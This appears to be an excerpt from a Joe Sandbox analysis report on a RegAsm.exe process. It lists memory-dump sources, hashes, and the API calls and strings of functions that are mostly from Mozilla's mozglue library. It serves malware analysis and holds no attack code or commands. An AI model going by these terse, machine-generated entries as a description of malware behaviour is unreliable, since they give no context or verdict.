Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: $g@
API String ID: 4291131564-2623900638
Opcode ID: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction ID: e9494377cad346e2cb6e0c3413faafdb083af89deffb74abb579b147fff80950
Opcode Fuzzy Hash: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction Fuzzy Hash: 7EF03C70101334BBDF315F26DC4CE8B7FA9EF06BA1F100456F949E6250E7724A40DAA1

Function 6C788AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C77FA80: GetCurrentThreadId.KERNEL32 ref: 6C77FA8D
Part of subcall function 6C77FA80: AcquireSRWLockExclusive.KERNEL32(6C7CF448,?,6C77FA1F,?,?,6C755407), ref: 6C77FA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C7912F7), ref: 6C788BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C7912F7), ref: 6C788C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6C7912F7), ref: 6C788C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6C7912F7), ref: 6C788CBA
free.MOZGLUE(?), ref: 6C788CCF

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: 9e0a3357da796031d1f89248cf19a5f3a44f127cbd7be775355ab327e783f46b
Instruction ID: 901bc01723190aa76755b95725559b89a446abff4eb903e97524b88909bb3f56
Opcode Fuzzy Hash: 9e0a3357da796031d1f89248cf19a5f3a44f127cbd7be775355ab327e783f46b
Instruction Fuzzy Hash: E571B275A05B018FD704CF29C584666B7F1FF89314F058AAEE9899B722E770F884CB41

Function 6C74F280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6C74F2B4
GetProcAddress.KERNEL32(00000000,?), ref: 6C74F2F0
NtQueryVirtualMemory.NTDLL ref: 6C74F308
RtlNtStatusToDosError.NTDLL ref: 6C74F36B
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6C74F371

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
String ID:
API String ID: 1171715205-0
Opcode ID: 4266c843ddf670f4b4e7e4821b8452bba69152966c0e30d6d1e523bf8e8ca9ef
Instruction ID: f82e5407d8fbb1b428b1fc95be0e3b1a27488e67c062c1ba49c7b0b9d5e57039
Opcode Fuzzy Hash: 4266c843ddf670f4b4e7e4821b8452bba69152966c0e30d6d1e523bf8e8ca9ef
Instruction Fuzzy Hash: 7321B470A01309DFEF20AA61CE48BEF76F9EB4535DF14C239E424A66C0D7B49988C761

Function 6C7977A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C797A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C797A93

Part of subcall function 6C765C50: GetTickCount64.KERNEL32 ref: 6C765D40
Part of subcall function 6C765C50: EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C765D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C797AA1

Part of subcall function 6C765C50: __aulldiv.LIBCMT ref: 6C765DB4
Part of subcall function 6C765C50: LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C765DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C797B31

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: af6658629591c95a3111bdcc926d092eb56cd3dcf99e99940283c0e8192d0254
Instruction ID: 45d89c7d9e6ff208efc5b6a4962089658ffa6660a38ee8c81b73c035c81a1e2e
Opcode Fuzzy Hash: af6658629591c95a3111bdcc926d092eb56cd3dcf99e99940283c0e8192d0254
Instruction Fuzzy Hash: 2CB1AF316083818BCB14CF25D65469FB7E2BFC9318F154A2CE99567B91DB70E90ACB82

Function 6C7AB700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6C7AB720
RtlNtStatusToDosError.NTDLL ref: 6C7AB75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,6C790BA4,00000000,?,0000001C,?,?,00000000,?,6C788E44,?,00000000,?,6C790BA4), ref: 6C7AB760

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 2f8789b70dd7d15bab85180cee23a8c4d7eb23547e23ed5053ee333e4a6ed5b0
Instruction ID: 69556658e60c0fb6441733ccf7beaad6d99621713a7bce0cc07222b633281318
Opcode Fuzzy Hash: 2f8789b70dd7d15bab85180cee23a8c4d7eb23547e23ed5053ee333e4a6ed5b0
Instruction Fuzzy Hash: 33F0AFB0A0020DAEEF019AF18E89BEE77BD9B0431AF10523AE515755C1D7B4A5C8C660

Function 6C7AB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C7503D4,?), ref: 6C7AB955
NtQueryVirtualMemory.NTDLL ref: 6C7AB9A5

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: 3f0234175ecec626895be1ea71c8d8554d0aa55456a677319d8502660b4aa7cc
Instruction ID: bb70ce15bd8d4b11238880258a9b986f2d8e8d402f2499a52d7ed1c7303c2f25
Opcode Fuzzy Hash: 3f0234175ecec626895be1ea71c8d8554d0aa55456a677319d8502660b4aa7cc
Instruction Fuzzy Hash: D3419171E0121D9FDF04CFA9D985ADEBBB6FF88314F14823AE405A7704DB31A9468B90

Function 6C7A55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C77E1A5), ref: 6C7A5606
LoadLibraryW.KERNEL32(gdi32,?,6C77E1A5), ref: 6C7A560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C7A5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C7A563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C7A566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C7A567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C7A5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C7A56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C7A56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C7A56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C7A56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C7A5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C7A572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C7A5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C7A5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C7A577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C7A5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C7A57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C7A57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C7A57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C7A57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C7A57FF

Strings

LoadCursorW, xrefs: 6C7A5774
GetDpiForWindow, xrefs: 6C7A5690
RegisterClassW, xrefs: 6C7A56AC
CreateSolidBrush, xrefs: 6C7A57E4
ReleaseDC, xrefs: 6C7A5742
FillRect, xrefs: 6C7A5729
LoadIconW, xrefs: 6C7A575B
CreateWindowExW, xrefs: 6C7A56C5
SetWindowLongPtrW, xrefs: 6C7A57B7
user32, xrefs: 6C7A5601
MonitorFromWindow, xrefs: 6C7A578D
GetSystemMetricsForDpi, xrefs: 6C7A5677
DeleteObject, xrefs: 6C7A57F9
GetMonitorInfoW, xrefs: 6C7A57A2
AreDpiAwarenessContextsEqual, xrefs: 6C7A5637
GetThreadDpiAwarenessContext, xrefs: 6C7A562D
SetWindowPos, xrefs: 6C7A56F7
GetWindowDC, xrefs: 6C7A5710
ShowWindow, xrefs: 6C7A56DE
EnableNonClientDpiScaling, xrefs: 6C7A5666
StretchDIBits, xrefs: 6C7A57CC
gdi32, xrefs: 6C7A560A

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 6f289a49e71c98d71c27b3189278d3b13e9d46ede5f11fdb4953f8189c43c132
Instruction ID: 27bbf817458b31280ffb3ec4afd021103bd54c46169a690e2472274afd9a2690
Opcode Fuzzy Hash: 6f289a49e71c98d71c27b3189278d3b13e9d46ede5f11fdb4953f8189c43c132
Instruction Fuzzy Hash: 2B516274701B076FDB449F76AF4492A3AFCBB0AB45B104539B921E3A01EB74DB018F61

Function 6C78CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default), ref: 6C78CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java), ref: 6C78CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C7BFE98), ref: 6C78CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf), ref: 6C78CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio), ref: 6C78CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio), ref: 6C78CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall), ref: 6C78CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C78CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C78CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C78CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C78CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C78CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C78CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C78CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C78CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C78CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C78CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C78CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C78CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C78CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C78CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C78CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C78CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C78CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C78CE8A

Strings

screenshots, xrefs: 6C78CCD4
audiocallbacktracing, xrefs: 6C78CDD4
stackwalk, xrefs: 6C78CCF8
fileio, xrefs: 6C78CC92
power, xrefs: 6C78CE84
cpuallthreads, xrefs: 6C78CE16
nativeallocations, xrefs: 6C78CDA8
leaf, xrefs: 6C78CC66
preferencereads, xrefs: 6C78CD92
default, xrefs: 6C78CC21
processcpu, xrefs: 6C78CE6E
notimerresolutionchange, xrefs: 6C78CE00
samplingallthreads, xrefs: 6C78CE2C
fileioall, xrefs: 6C78CCA8
nostacksampling, xrefs: 6C78CD7C
noiostacks, xrefs: 6C78CCBE
Unrecognized feature "%s"., xrefs: 6C78CEA0
jsallocations, xrefs: 6C78CD0E
seqstyle, xrefs: 6C78CCE6
ipcmessages, xrefs: 6C78CDBE
unregisteredthreads, xrefs: 6C78CE58
java, xrefs: 6C78CC37
mainthreadio, xrefs: 6C78CC7C
markersallthreads, xrefs: 6C78CE42

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 124aee638f0b12b98fafa22b75a0a301e950c157328392bbc425b814ec2cbe57
Instruction ID: 6417eee8646b84a425ab46301be522ce33ef7fe13acb619d5ba3af4b526f11c8
Opcode Fuzzy Hash: 124aee638f0b12b98fafa22b75a0a301e950c157328392bbc425b814ec2cbe57
Instruction Fuzzy Hash: B551BBC5A4722552FA0035256F1ABAA1409EF5324BF50C63AEF09B2F80FF15F70986B7

Function 6C7547E6 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 220threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C754801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C754817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C75482D
__Init_thread_footer.LIBCMT ref: 6C75484A

Part of subcall function 6C77AB3F: EnterCriticalSection.KERNEL32(6C7CE370,?,?,6C743527,6C7CF6CC,?,?,?,?,?,?,?,?,6C743284), ref: 6C77AB49
Part of subcall function 6C77AB3F: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C743527,6C7CF6CC,?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77AB7C

GetCurrentThreadId.KERNEL32 ref: 6C75485F
GetCurrentThreadId.KERNEL32 ref: 6C75487E
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C75488B
free.MOZGLUE(?), ref: 6C75493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C754956
free.MOZGLUE(00000000), ref: 6C754960
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C75499A
free.MOZGLUE(?), ref: 6C7549C6

Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C754812
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C754828
[I %d/%d] profiler_shutdown, xrefs: 6C754A06
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C7547FC
MOZ_PROFILER_SHUTDOWN, xrefs: 6C754A42

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: 99973ed8f4f86fa9dbe7d0df962a92173825bee790674bd85e76add479dd3d60
Instruction ID: 50dd2273d1a6f0e074f79499d0ba568015cbc51be07e2d2eb6fb41eacbcf3e7c
Opcode Fuzzy Hash: 99973ed8f4f86fa9dbe7d0df962a92173825bee790674bd85e76add479dd3d60
Instruction Fuzzy Hash: 7C813675E001028FDB409F28DA4875A37B5BF42318F940239E91697F42EB31EA74DB96

Function 6C754470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C754730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C7544B2,6C7CE21C,6C7CF7F8), ref: 6C75473E
Part of subcall function 6C754730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C75474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C7544BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C7544D2
InitOnceExecuteOnce.KERNEL32(6C7CF80C,6C74F240,?,?), ref: 6C75451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C75455C
LoadLibraryW.KERNEL32(?), ref: 6C754592
InitializeCriticalSection.KERNEL32(6C7CF770), ref: 6C7545A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C7545AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C7545BB
InitOnceExecuteOnce.KERNEL32(6C7CF818,6C74F240,?,?), ref: 6C754612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C754636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C754644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C75466D
VerSetConditionMask.NTDLL ref: 6C75469F
VerSetConditionMask.NTDLL ref: 6C7546AB
VerSetConditionMask.NTDLL ref: 6C7546B2
VerSetConditionMask.NTDLL ref: 6C7546B9
VerSetConditionMask.NTDLL ref: 6C7546C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7546CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C7546F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C7546FD

Strings

l, xrefs: 6C754578
user32.dll, xrefs: 6C754557, 6C75463F
WRusr.dll, xrefs: 6C7544B5
G|l, xrefs: 6C7544FC
kernel32.dll, xrefs: 6C7544CD
NativeNtBlockSet_Write, xrefs: 6C7546F7

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: G|l$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-4167449071
Opcode ID: 2f3679500a603b1117d34127790f872038f477b1f7a6d24a9320e1d8c6182a27
Instruction ID: 9ed49d03d673ca46947eaaf3c96f8595439232678bc12c38bd2d5ee2329635b1
Opcode Fuzzy Hash: 2f3679500a603b1117d34127790f872038f477b1f7a6d24a9320e1d8c6182a27
Instruction Fuzzy Hash: CF6106B0A0024AAFEB109F61CE49BA57BF8EB46708F44C578E9049B641DB719B64CF91

Function 6C7519A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C7CF760), ref: 6C7519BD
GetCurrentProcess.KERNEL32 ref: 6C7519E5
GetLastError.KERNEL32 ref: 6C751A27
moz_xmalloc.MOZGLUE(?), ref: 6C751A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C751A4F
GetLastError.KERNEL32 ref: 6C751A92
moz_xmalloc.MOZGLUE(?), ref: 6C751AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C751ABA
LocalFree.KERNEL32(?), ref: 6C751C69
free.MOZGLUE(?), ref: 6C751C8F
free.MOZGLUE(?), ref: 6C751C9D
CloseHandle.KERNEL32(?), ref: 6C751CAE
ReleaseSRWLockExclusive.KERNEL32(6C7CF760), ref: 6C751D52
GetLastError.KERNEL32 ref: 6C751DA5
GetLastError.KERNEL32 ref: 6C751DFB
GetLastError.KERNEL32 ref: 6C751E49
GetLastError.KERNEL32 ref: 6C751E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C751E9B

Part of subcall function 6C752070: LoadLibraryW.KERNEL32(combase.dll,6C751C5F), ref: 6C7520AE
Part of subcall function 6C752070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C7520CD
Part of subcall function 6C752070: __Init_thread_footer.LIBCMT ref: 6C7520E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6C751F15
VerSetConditionMask.NTDLL ref: 6C751F46
VerSetConditionMask.NTDLL ref: 6C751F52
VerSetConditionMask.NTDLL ref: 6C751F59
VerSetConditionMask.NTDLL ref: 6C751F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C751F6D

Strings

D, xrefs: 6C751B57

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: ee7f4ee2c856c039d42260380b6e873699ba64e9a2bcf25d5e02a7a58eaec8b5
